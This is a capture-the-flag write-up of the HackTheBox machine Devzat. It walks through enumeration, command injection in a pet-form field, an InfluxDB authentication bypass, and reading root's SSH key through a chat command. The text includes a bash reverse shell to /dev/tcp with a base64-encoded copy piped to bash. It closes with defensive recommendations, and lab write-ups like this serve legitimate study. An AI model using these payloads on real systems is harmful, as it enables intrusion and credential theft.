---
title: "Writeup - Devzat (HTB)"
date: 2022-03-15
slug: "writeup-devzat-htb"
type: "writeup-ctf"
--- 

This is a writeup for the [Devzat](https://app.hackthebox.com/machines/Devzat) machine from  the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV 10.10.11.118
```
Three TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp : SSH port (OpenSSH 8.2p1)
- 80/tcp : HTTP web server (Apache 2.4.41)
- 8000/tcp : SSH

I add the domain to the /etc/hosts file:


```bash
10.10.11.118	devzat.htb
```
I then access the site via a browser:

![](img/image-2.webp)

## Exploit

After looking at the site I notice that a shell command is given as an example at the bottom of the page:


```bash
ssh -l [user_name] devzat.htb -p 8000
```
This command connects to the application hosted on port 8000.

![](img/image-3.webp)

This application is an interactive chat with a number of commands available:

![](img/image-4.webp)

Nothing particular for the moment. I make a directory scan on the site. For that I use "ffuf" with the wordlist [common.txt](http://ffuf.me/wordlists).


```bash
ffuf -c -u http://devzat.htb/FUZZ -w Documents/commun.txt
```
![](img/image-5.webp)

Several folders but quite classic one. Now let's scan the subdomains:


```bash
ffuf -c -u http://devzat.htb -w Documents/sub.txt -H "Host: FUZZ.devzat.htb" -fw 18
```
![](img/image-6.webp)

A subdomain is found ! I add it in the /etc/hosts file then I go to the site :

![](img/image-7.webp)

It is a web page with a formulary to add pets. Now let's scan the folders for this subdomain.

![](img/image-8.webp)

This is a git project with a number of files.

![](img/image-9.webp)

I will download the projects with the following command:


```bash
wget -r -np -R "index.html*" http://pets.devzat.htb/.git
```
I first check the last commit to see if any files have been modified or deleted:

![](img/image-10.webp)

And indeed a large number of files have been deleted, so I will restore the last commit with the following command:


```bash
git checkout -- .
```
![](img/image-11.webp)

Now that we have the complete tree, let's start the code analysis. Let's start with main.go.

I find in this file, a function related to the loading of the character of the pet animal. This function takes as argument the species. It then executes a "sh" command which retrieves the content of one of the files contained in the "characteristics" folder. We will be able to use this function to execute some code.

![](img/image-12.webp)

For that I make a classic request that I intersperse with Burp.

![](img/image-13.webp)

Then I modify the value of "species" to insert my code. I test at first a classical reverse shell, but without success.

![](img/image-14.webp)

Let's try to convert our command to Base64 to ensure that there is no modification before execution on the target machine.

[Reverse Shells - Pentest Book](https://pentestbook.six2dez.com/exploitation/reverse-shells)

For that I use the following command to encode my reverse shell command in base64.


```bash
echo "bash -i >& /dev/tcp/10.10.16.2/1234 0>&1" | base64
```
Then I transmit the following order in the form.


```bash
echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yLzEyMzQgMD4mMQo=' | base64 -d | bash
```
Bingo, I am now connected as Patrick.

![](img/image-15.webp)

No change it's not this user who has the first flag. I will have to find a way to change the user. To start, I'll run the [linPeas](http://linpeas.sh) script to get an overview of the machine.

The first thing that catches my attention is the number of open ports.

![](img/image-16.webp)

Indeed there are a number of ports open only locally on the machine. So I will do an ssh port forwarding.


```bash
ssh -L 8086:127.0.0.1:8086 -N patrick@10.10.11.118
```
I can then perform an nmap scan on my local address to identify the service running on port 8086.

![](img/image-17.webp)

It is the InfluxDB service in version 1.7.5 that runs on this port. Let's look for an exploit...

After some research I found the CVE-2019-20933. It is an exploit that allows to get an admin access to the database without using a password. I use the following script:

{{< github repo="LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933" >}}

I will now be able to search for information in the different databases. At first I look for the registered users :

![](img/image-19.webp)

I find the user "catherine" with her password. This is a very good news, indeed it is her who has the first flag.

![](img/image-20.webp)

I connect with ssh, then I get the flag.

## Privilege escalation

In the linPeas scan result I also noticed that a "devchat" service was running with patrick rights. It looks like a test version running on port 8443 in parallel with the production version.


```bash
catherine@devzat:~/dev/dev$ ps aux | grep dev
[...]
patrick	839	0.0	0.5	1085916	11904	?	Sl	12:28	0:00	./devchat
[...]
```
I also found backup files related to this same service:

![](img/image-21.webp)

These are files belonging to catherine, good news I will be able to recover them and analyze them to find an exploit.

In the file "commands.go", I quickly find that the command /file uses a password to work. And this password is clearly indicated.

![](img/image-22.webp)

Ok let's try the different things we discovered.

I log back in as patrick, then start a local SSH session on 8443.

![](img/image-23.webp)

Let's try to read a root file with the command /file and with the password found previously. I test with the file id\_rsa of the user root.

![](img/image-24.webp)

It works! So now I can connect as root with ssh. Then get the last flag.

![](img/image-25.webp)

## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Do not leave .git accessible on a website
- Do not use shell commands in functions used by forms accessible on a web site
- Do not store non-hasher passwords in a database
- Update InfluxDB
- Do not run the chat bot with root privileges